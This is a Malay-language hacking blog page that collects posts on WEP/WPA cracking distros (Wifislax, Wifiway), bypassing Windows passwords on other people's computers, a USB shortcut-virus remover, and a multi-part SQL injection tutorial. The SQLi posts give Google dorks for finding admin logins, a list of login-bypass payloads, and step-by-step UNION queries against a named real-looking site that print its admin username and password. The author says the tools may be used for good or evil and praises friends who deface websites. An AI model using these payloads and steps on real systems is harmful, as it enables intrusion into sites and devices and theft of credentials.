Popular Post

Wifislax : Wireless Hacking Live CD

By : Trilogy
Seperti biasa Franz rajin berjalan-jalan di dunia siber dan pada masa berjalan-jalan itulah Franz akan selalu berjumpa dengan benda-benda yang menarik untuk dikongsikan bersama dengan para pembaca semua. Boring nak dengar intro? Haha! Ok-ok..Jom kita teruskan dengan isi entri..

Apa Itu Wifislax?

Perkara pertama yang Franz nak anda tahu, Franz bukanlah peminat distro Linux yang bernama Slax, kerana bagi Franz, itulah distro yang paling tak boleh 'blah' sekali. A lot of epic phail!
Tapi lepas kenal dengan Wifislax, Franz mula suka dengan sistem operasi Linux yang boleh dimasukkan ke dalam poket ni. Err.. Ye lah.. poket! Teruskan membaca..
Wifislax ialah sebuah sistem operasi Linux (Linux Operating System) berasaskan Slax, sebuah sistem operasi Linux yang digelar 'sistem operasi poket' kerana saiznya yang kecil dan boleh dibuat Live Boot dari USB Pendrive atau CD sahaja. Cuma Wifislax dibuat dengan tujuan untuk melakukan ujian-ujian penembusan (penetration distribution distro) dan penggodaman WEP Wireless.

Beberapa paparan skrin yang diperolehi dari wifislax.com:



Cara menggunakannya amat senang.

1. Anda hanya perlu rakam (burn) imej ISO yang telah dimuat turun melalui laman web rasmi distro ini dengan menggunakan Unetbootin ke dalam Pendrive.

2. Tukarkan Boot Order yang pertama melalui BIOS Settings kepada USB

3. Reboot

4. Sebelum keluar lambang Windows (atau GRUB Linux, jika anda menggunakan Linux), tekan kekunci esc, atau F12, F10, atau mana-mana kekunci yang akan membawa anda kepada pilihan tetapan boot.

5. Pilih Pendrive anda (Kingston ke, Winston ke, Dunhill ke..Haha! Jenama Pendrive sendiri, sendiri mau ingat la!)

6. Anda akan di bawa ke dalam alam barzakh sistem operasi Wifislax.

7. Tahniah. Anda sudah boleh mula menggunakannya. Terdapat banyak WiFi Hacking Tools di dalam yang boleh dicuba satu demi satu. Kalau dah berjaya menggodam kata laluan WEP yang anda kehendaki, sila reboot semula ke dalam sistem operasi lalai (default) anda sama ada Windows, Linux, Mac OS X..ahhh..tak kisah lah.. Dah reboot apa lagi..Guna la WEP key tu! Pastikan salin dulu ok!

Untuk pengetahuan anda, distro ini telah dibuat oleh para penulis-penulis distro dari Sepanyol, oleh itu bahasa dalam tu memang tunggang dengan cermat langgang dengan bahasa Sepanyol. Jika anda mahu menukarkannya kepada bahasa Inggeris, silalah terokai sendiri. Sebab Mr.Hac sendiri pun tak sempat nak teroka habis! Hahah! Maaflah ya!

Apapun Franz boleh mengesyorkan kepada anda untuk mencuba Wifislax. Tak rugi sebab boleh bawa ke mana-mana dalam pendrive bersaiz minima 1GB kalau tak silap, dan yang paling penting ianya bersifat 'ringan' dan pantas. Tidak banyak menggunakan RAM, menjimatkan bateri...ahhh..Cuba sendiri la! Cakap banyak tak guna kan?
Blaze it bro! Blaze it up and good luck!

Anda boleh muat turun dan membaca mengenai Wifislax
melalui laman web rasminya di sini -> Wifislax

Wifiway : Hack WEP/WPA Dengan Lebih Mudah

By : Trilogy
Salam semua. Sebelum bagi intro panjang-panjang apa kata anda baca dulu entri mengenai Wifislax
di sini -> Wifislax

Apa Itu Wifiway?

Wifiway ialah sistem operasi Linux berasaskan Wifislax. Ibarat anak dia la! Namun ia telah berevolusi dengan banyak dan sangat pantas, dari versi 1.0 sehinggalah versi terkini ketika entri ini ditulis iaitu 2.0.3, ia telah meletakkan satu tanda aras dalam distro untuk penggodaman WEP dan WPA. Untuk versi 2.0.3, para penulis dan pembangun sistem operasi ini telah menaiktaraf pelbagai perisian seperti 'airoscript' dengan mode 'auto crack' yang memberikan kita kuasa untuk melakukan ujian penembusan terhadap sambungan tanpa wayar yang berhampiran dengan kita, dan ia dilakukan secara automatik penuh!

Seperti Wifislax, ia dipaparkan dalam bahasa Sepanyol secara lalai (default). Untuk menukarnya kepada bahasa Inggeris, sila ikuti tutorial dalam video ini -> Wifiway English Settings

Anda boleh memuat turun Wifiway melalui salah satu pautan di bawah:

1. Mirror 1

2. Mirror 2

Asas SQL-i Tutorial 1

By : Trilogy




Mari kita belajar asas SQLi sama- sama. Janjang edit sikit ayat ikut cite rasa sendiri. Banyak nak kena kredit ni. Yela, Janjang pon baru belajar juga, jadi kenalah cari rujukan banyak terutama kepada KenaHack dan beberapa forum komuniti hacker.


SQL Injection ( SQLi Tutorial )

5 perkara yang anda perlu tahu tentang SQLi

- Asas injection
- Mendapatkan Data
- Keluarkan Data
- Kumpul Maklumat
- Kumpul Data


Asas Injection

Mula-mula kita perlu pahamkan atau gambarkan dulu apa yang sebenarnya dan bagaimana SQLi ini dilakukan. Cuba baca ringkasan yang ade dibawah sebelum kita mulakan langkah pertama menggunakan SQLi.

- Cara mudah mengesan laman yang menggunakan sql ialah jika diperhatikan pada URL ( alamat web ) , ianya mempunyai perimeter id= seperti :

http://www.contoh.my/index.php?id=1

"index.php" merupakan nama file dan "id=1" merupakan perimeter bagi sesuatu info pada laman tersebut.

- Didalam SQL ia diperintah dengan menggunakan perintah :


$result = $db -> query ("SELECT * FROM `content` WHERE id=" . $_GET
['id']);
dan kebiasaanya laman akan diperintahkan melalui :

SELECT * FROM `content` WHERE id=1

- Ini akan membolehkannya disuntik ( inject ) pada perimeter id=1 . Contohnya :

http://www.contoh.my/index.php?id=1'

- Maka anda akan perhatikan keluar error seperti :

Fatal error: Call to a member function fetch_row() on a non-object in
/home/sites/contoh.my/public_html/index.php on line 50

- Namunpun begitu , bukan semua laman akan mengeluarkan error jenis ini, jika anda perhatikan perbezaan laman sebelum dan selepas di inject , maka ia berpotensi di inject.

Okaylah, mari kita mulakan langkah pertama untuk SQLi.


Memintas login admin

Mendapatkan kuasa admin dengan cara memintas akaun admin.

Seperti yang semua tahu , jika ingin melakukan SQL injection , semestinya laman tersebut menggunakan Database. Ini kerana melalui injection sql ini adalah untuk mendapatkan maklumat melalui database tersebut.

Kebiasaannya site yang berpotensi adalah yang berformat *.asp dan *.php.

Mula-mula sekali, kita perlu cari laman sasaran.

Cara yang biasa digunakan untuk mendapatkan sasaran ialah menggunakan google dork.Apakah Dork? Sila klik untuk lihat post sebelum ini.

Kalau nak diikutkan senarai google dork ni terlalu besar bagi kegunaan asas SQLi. Bagaimanapon ini yang paling mudah dan terbaik;

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Sekarang ape yang kite perlu buat setelah dapat sasaran?
Sasaran akan memberi kandungan paparan seperti ini:


ADMIN USERNAME :
PASSWORD :
jadi ape yang perlu kita buat adalah biasanya kita akan taip “Admin” pada ruang username. Dan pada ruang password kita akan taip SQLi kita.

Ini senarai SQLi:


' or '1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Jadi apa yang perlu anda taip adalah seperti ini.


username:Admin
password:'or'1'='1

ini akan buat system sql pada sasaran menjadi bingung dan akan memerikan akan kuasa penuh keatas website sasaran kepada anda sebagai admin.

Jika website sasaran anda lemah dan mudah terjejas, anda akan dapat kuasa penuh admin padanya.

Kita sambung lagi dalam siri seterusnya nanti. Cuba pahamkan konsep sqli ni.
Untuk siri akan datang, insyaAllah Janjang akan selitkan beberapa screenshot untuk rujukan anda.

Pecahkan Passwords Komputer / Laptop Orang Lain

By : Trilogy




Sediakan Alatan Ini :
-Unetbootin
-ResetWindowsPasswords
Dapatkan Alatan Tersebut : Di Sini

1) Download software untuk burn ke dalam pendrive.
eg : Unetbootin

2) Sediakan satu pendrive kosong.

3) Buka unetbootin, dan burn software yang boleh pecahkan password windows tu ke dalam pendrive.

4) Pergi ke komputer yang hendak dipecahkan passwordnya, cucuk pendrive. Start PC, dan masuk ke boot menu.

5) Nanti akan keluar satu interface yang membolehkan anda menghilangkan passwords atau menukarnya mengikut kemahuan anda.

Note :
# Guna lah untuk tujuan apa sekali pun, jahat atau baik. Ikut diri sendiri, aku tak mampu nak suruh korg ikut cakap aku.
# Jangan sesekali berkongsi software ini kepada umum tanpa pengetahuan aku.
# Nantikan Update Daripada Kami !

Virus Shortcut Remover Tool V3.1 UiTM

By : Trilogy
Salam...

Menyampah tak tengok ada shortcut-shortcut hidden dalam hard disk atau pendrive?
Bila di klik kosong.
Delete tak boleh,scan guna anti virus pun masih ada lagikan?
kalau hilang pun hilang kejap.
Lepas shutdown atau remove pendrive,on balik,cucuk balik pendrive masih ade lagi virus shortcut ni kan?hehehe..kesian...hahaha
Biasanya folder-folder shortcut ini bersaiz 2 kb hingga 8 kb.


Maka dengan sebab itu lahirlah seorang anak Malaysia pelajar dari UiTM menghasilkan
virus remover tool ini.

Tool ini telah diguna pakai dengan meluas di negara ini dan tidak terkecuali/hairan juga telah diguna pakai oleh seluruh dunia.



---Mudah saja nak guna tool ini.Cuma perlu download disini dan kemudian klik saja fail itu




---Pilih sama ada mahu buang virus di Pen drive atau Computer






 ---Lepas itu pilih mana-mana device yang mahu di bersihkan kerana ini untuk Pen drive.
Tekan scan dan delete semuanya





---Yang ini pula jika pilih PC.Tekan scan dan delete semuanya. Selesai


**Jika masih ada lagi yang tidak dapat di buang,cuba run tool ini dalam keadaan Safe Mode.**


Perasaan bangga tu muncul apabila kali pertama mencuba sendiri tool ini.
Anak Malaysia yang menghasilkanya mana tak bangga kan?

Nak tahu sape yang cipta tool ni?
klik Help pada muka hadapan tool ini.
klik pula pada about.

Asas SQLi - Tutorial S4

By : Trilogy


Franz tak mau cite panjang, jom kita tengok langkah seterusnya selepas kita dah dapat nombor2 ajaib tu..

Kumpul Maklumat

- Setelah kita mendapat no ajaib iaitu 8, 3, 4 dan 5 , disini kita akan cuba dapatkan pula maklumat versi / database yang digunakan laman ini.
- Jadi , anda hanya perlu tambah arahan version() atau "@@version" pada no ajaib , maka akan keluar versi / database yang digunakan. Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,version(),3-- 
atau
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,@@version,3-- 

- Maka versi database akan muncul seperti 4.X.X atau 5.X.X , jika database laman tersebut menggunakan versi 5 , maka anda boleh guna default database name nya iaitu information_schema .
- Jadi , database name kita dah dapat , seterusnya kita dapatkan table name pula melalui arahanTABLE_NAME. Arahan ini diletakkan di no ajaib tadi

- Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,TABLE_NAME,3-- 
- Dan tambahkan database name kat belakang menjadi :
 http://www.contoh.my/index.php?id=1+UNION+SELECT+1,TABLE_NAME,3+from+information_schema.tables--

- Maka anda akan dapat lihat table yang ada dalam database laman tersebut.
Mendapatkan versi pangkalan data

Kita sudah jumpa column 8 , 3 , 4 and 5 adalah column ‘vulnerable’ jadi kita akan gunakannya untuk mendapatkan versi database yang digunakan.

Eh, kenapa pula kita nak kena tau versi database pulak ni?
sebabnya, kalau database dibawah versi 5, kita perlu meneka nama table yang ada. Sebaliknya jika database dalam versi 5 dan keatas, kita hanya perlukan ‘default name’ iaitu information_schema.

kita perlu tukar salah 1 column yang ‘vulnerable’ kepada “@@version” atau “version()".

Untuk contoh, kita ambil column 8.

Link kita sepatutnya kelihatan seperti ini:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--

The page should look like that :

Dalam contoh tutorial ini kita dapat  versi 5.0.77 yang mana ia diatas versi 5, jadi kita teruskan langkah seterusnya.

sekarang kita perlukan nama table yang kita nak akses :
untuk itu, kita perlu tukarkan “@@version dengan “table_name" dan menambah selepas nombor column terakhir  dengan “from information_schema.tables" dan kemudian diikuti dengan "--" dihujung.


link kita akan kelihatan seperti ini:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

dan laman akan kelihatan begini:

Sekarang kita akan cari table mana yang kita mahu akses dan dapatkan maklumat.
Kita perlukan maklumat berkenaan dengan admin, dan dalam kes kita kita dapati tbladmin adalah yang kita perlukan. (skrol kebawah dan perhatikan semua table betul-betul untuk mencari table yang tepat)

Sekarang kita dah dapat table yang diperlukan. Lepas ni, apa kita kena buat? Tunggu siri seterusnya. insyaAllah siri yang terakhir dalam tutorial ringkas asas suntikan SQL ini.

Setakat ini macam mane? Harap2 korang semua dapat paham. Ikuti siri seterusnya yang kelima dan terakhir insyaAllah dalam masa terdekat. kalau ade soalan, boleh tanya diruang komen, Franz akan cuba dapatkan jawapan.

Asas SQLi - Tutorial S5

By : Trilogy

kita baca point-point bagi siri kelima ini dahulu

Kumpul Data
- Jadi sekarang anda sudah dapat lihat table yang ada dalam laman tersebut , langkah terakhir ini ialah untuk mengumpul Data daripada table.
- Jadi , perkara asas yang biasanya penggodam lakukan ialah mencari table yang mengandungi maklumat Admin / users bagi membolehkannya mendapatkan maklumat login ( email, username, password dll)
- Gunakan arahan group_concat(table_name) pada no ajaib bagi mengeluarkan maklumat dalam table tersebut.

- Contohnya :
  http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(table_name),3+from+information_schema.tables--

- Dan gantikan +from+information_schema.tables+where+table_schema=database()-- kat belakang.

Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--

- Kali ini anda akan perhatikan folder table yang mengandungi data didalamnya. Contohnya anda lihat table yang bernama " Admin " , sila convert table name " Admin " tersebut kepada HEXADECIMEL
- Setelah anda convert , sila masukkan arahan group_concat(column_name) kat no ajaib tadi ( 2 ).

Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(column_name),3+from+information_schema.tables+where+table_schema=database()--

 - Dan kemudian tambahkan arahan  +from+information_schema.columns+where+table_name=0xHEXADECIMEL-- . Contohnya table name tadi "Admin " , setelah di convert menjadi 41444D494E . Maka arahan akan jadi seperti berikut :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x41444D494E--

- Sekarang kita berada dalam folder ADMIN , jadi kita akan keluarkan data melalui arahan concat_ws(0x3a,"nama column yang terkandung dlm table ADMIN") . Contohnya table yang ada ialah "username" dan "password" , maka arahan akan jadi seperti berikut :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,concat_ws(0x3a,"username,password"),3+from+information_schema.columns+where+table_name=0x41444D494E--

- Kemudian gantikan arahan belakang kepada +from+Admin-- bagi menjayakan arahan untuk mendapatkan maklumat daripada table ADMIN. Maka arahan akan seperti berikut :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,concat_ws(0x3a,"username,password"),3+from+Admin--

- Dan sekarang anda akan lihat data "username" dan "password" seperti arahan yang kita jalankan.
- Password berkemungkinan besar dalam bentuk hash , jadi anda perlu decrypt untuk mendapatkan plain text nya seterusnya mendapatkan login page admin tersebut.
------------------------------------------------------------------


Biaklah, berbalik pada tutor pada siri yang lepas, setelah diteliti kita dapati table yang kita perlukan bernama tbladmin. Apa yang perlu kita buat lepas ni ialah kita perlu tukarkan perkataan atau nama table tadi kepada nilai HEX (hexadecimal) ataupon nilai ASCII (sebutannya ‘ass-key’... ops...).

Apakah dia ASCII ?
Rujuk disini;  http://en.wikipedia.org/
Sekarang kita dapatkan nilai ASCII atau HEX bagi ‘tbladmin’ dilaman dibawah;

atau

Masukkan kotak pertama dengan nama table, dalam tutor ini kita ambil tbladmin untuk tukar ke ASCII atau ke HEX. Masukkan perkataan seperti dibawah untuk tukar.
tbladmin

setelah dapat ASCII bagi nama table, apa yang kita perlu buat selepas itu ialah buangkan karakter " & #"sekiranaya ada dan tambah tanda koma "," diantara setiap nombor sekiranya tiada .
Ia akan kelihatan seperti ini bagi ASCII:
116,98,108,97,100,109,105,110
dan begini kalau HEX:
74626C61646D696E
Seterusnya tukarkan beberapa perkataan yang terdapat di URL, tukar "table_name" kepada "column_name" dan tukar "information_schema.tables" kepada "information_schema.columns” dan tambahkan diakhir dengan "where table_name=char(nilai ASCII)--” ataupon "where table_name=0x(nilai HEX)-- 
 
dimana dalam kes ini kita masukkan (nilai ASCII) itu dengan (116,98,108,97,100,109,105,110)-- atau nilai HEX dengan 74626C61646D696E--
URL kita akan kelihatan seperti ini:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--
atau,
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=0x74626C61646D696--
Laman kita akan kelihatan seperti ini:


Yay, sekarang kita dah nampak nama-nama column yang menyimpan data. Langkah seterusnya kita cari column mana yang mungkin menyimpan data yang kita perlukan. Dalam kes ini kita cari column yang bernama  “username" dan "password" atau sesuatu yang seakannya. Nama column mungkin berbeza mengikut cita rasa admin laman tersebut, jadi kena bijak buat pilihan. Bagi kes dalam tutor ini kita dapat senang jer iaitu "username" dan "password".

Lepas dah dapat tengok nama-nama column ni, kita perlu ubah URL kita lagi sekali. Kali ini, kita buang semua selepas nombor column terakhir – dalam kes ini ia nombor 11 (rujuk tutor sebelum ini macam mana kita dapat) dan tambahkan "from tbladmin" diakhir URL dan gantikan "column_name" dengan"concat(username,0x3a,password)”.
0x3a
 ialah nilai ASCII bagi tanda “ : ” . ia digunakan untuk memisahkan username dan password .

URL kita kelihatan begini:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin

Maka, akan terpaparlah data seperti di bawah:

Kita Berjaya ! Kita dah dapat username  ishir dan password ishir123
kadang-kadang password di enkrip dengan Hashes. Gunakan HASH Detector dibawah untuk dekrip password. Boleh jugak guna HASH decryptor yang online jika anda mahu.

Download HASH Decryptor

Hah, dah la, dah habis dah tutor ni ! janjang pon dah penat. Hehe gurau jer. 
Alhamdulillah selesai jugak tutorial Asas SQLi ni. kepada korang semua, Selamat mencuba semua yer. Lagi sekali Kredit kepada KenaHack [KH] dan Komuniti Hack diatas tutorial ini. Franz mohon maaf kalau ade yang tak jelas dalam siri Asas SQLi ni ataupon Janjang tak dapat nak jawap soalan2 korang dalam siri2 lepas. Nak buat camne, penulis ni p on noob jer. Lain la Mr.Hac dengan Analyzer, siap dah deface website  orang lagi.. power tol diorangkan. Kalau tanyer diorang berdua tu mesti dapat jawab punyer la.

Harap-harap ni bukan entri terakhir Franz, insyaAllah kita jumpe lagi dalam entri akan datang..

- Copyright © Franz Creation - Date A Live - Powered by Blogger - Designed by Johanes Djogan -